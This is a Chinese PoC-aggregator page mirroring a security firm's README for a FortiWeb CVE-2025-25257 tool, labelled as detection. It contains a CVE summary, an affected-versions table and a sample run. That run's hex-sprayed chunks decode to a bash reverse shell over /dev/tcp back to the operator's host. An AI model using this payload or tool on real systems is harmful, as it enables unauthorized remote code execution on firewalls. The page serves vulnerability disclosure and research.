POC详情: 749bb27d28f178d8258b91b7d1c4999c6b4c4926

来源
https://github.com/watchtowrlabs/watchTowr-vs-FortiWeb-CVE-2025-25257
关联漏洞
标题: Fortinet FortiWeb SQL注入漏洞 (CVE-2025-25257)
描述:Fortinet FortiWeb是美国飞塔(Fortinet)公司的一款Web应用层防火墙,它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁,保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 7.6.3及之前版本、7.4.7及之前版本、7.2.10及之前版本和7.0.10之前版本存在SQL注入漏洞,该漏洞源于对SQL命令中特殊元素中和不当,可能导致SQL注入攻击。
介绍
# watchTowr-vs-FortiWeb-CVE-2025-25257

Detection Artifact Generator for FortiWeb CVE-2025-25257


See our [blog post](https://labs.watchtowr.com/) for technical details



https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194



# Detection in Action

```
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

```

# Description

This script attempts to detect if FortiWeb is vulnerable to CVE-2025-25257

# Affected Versions

The following versions of FortiWeb are Affected

| Version      | Affected             | Solution                   |
| ------------ | -------------------- | -------------------------- |
| FortiWeb 7.6 | 7.6.0 through 7.6.3  | Upgrade to 7.6.4 or above  |
| FortiWeb 7.4 | 7.4.0 through 7.4.7  | Upgrade to 7.4.8 or above  |
| FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above |
| FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above |

For more information visit [FortiGuard Labs PSIRT](https://fortiguard.fortinet.com/psirt/FG-IR-25-151)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
文件快照

 [4.0K]  /data/pocs/749bb27d28f178d8258b91b7d1c4999c6b4c4926
├── [2.7K]  README.md
└── [2.7K]  watchTowr-vs-FortiWeb-CVE-2025-25257.py

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。